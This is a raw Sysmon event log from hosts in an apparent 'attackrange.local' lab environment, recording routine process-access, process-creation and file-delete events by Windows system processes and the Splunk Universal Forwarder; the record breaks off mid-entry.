08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811078Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811077Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811076Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811075Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F92D-60EB-FB79-00000000D001}340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000811074Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.668{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F92D-60EB-FB79-00000000D001}340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000811073Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.668{0C1E0330-F92D-60EB-FB79-00000000D001}340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000811072Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.293{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5CF074353B2FAD7651EC27A728B23AA,SHA256=E1E86D05CBAB62029D6721084C66B65C3872258B65624218F37156D6E2C44CD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811071Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.293{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C94FD9ACE15646AE05DCCC96ABFDF06F,SHA256=E1445FE012BC21FCFCFEDE8C5D7094B8307A3CEA6ED4AADA26EBF2FCD7E862F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000811070Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F92C-60EB-FA79-00000000D001}764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000811102Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.855{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51E070AFB03CDF13AACE80DC9F10F999,SHA256=9C593D8D9CB16A7161CFCF0B63B8B8373043313741D0660A2FEA3FD03D5D64AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:26.018{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C7637648407F551F6E65B12E5253768,SHA256=DBE695C781FA0AF158A343903462499EFD6CC7339C2C0A2A55D723CBF9A30C6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811101Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.683{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5CF074353B2FAD7651EC27A728B23AA,SHA256=E1E86D05CBAB62029D6721084C66B65C3872258B65624218F37156D6E2C44CD8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000811100Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F92E-60EB-FC79-00000000D001}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811099Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811098Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811097Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811096Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811095Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811094Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811093Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811092Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811091Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811090Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.355{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F92E-60EB-FC79-00000000D001}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000811089Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.355{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F92E-60EB-FC79-00000000D001}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000811088Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.356{0C1E0330-F92E-60EB-FC79-00000000D001}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000811130Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.918{0C1E0330-F92F-60EB-FE79-00000000D001}33283348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:27.037{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A3D02528341A82434C3E87EC2A795FD,SHA256=6591E4F3E7D2488F27490EA35E19366A7DDA76622793D5B1CB8D729AFAE55CAF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000811129Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.762{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F92F-60EB-FE79-00000000D001}3328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811128Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811127Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 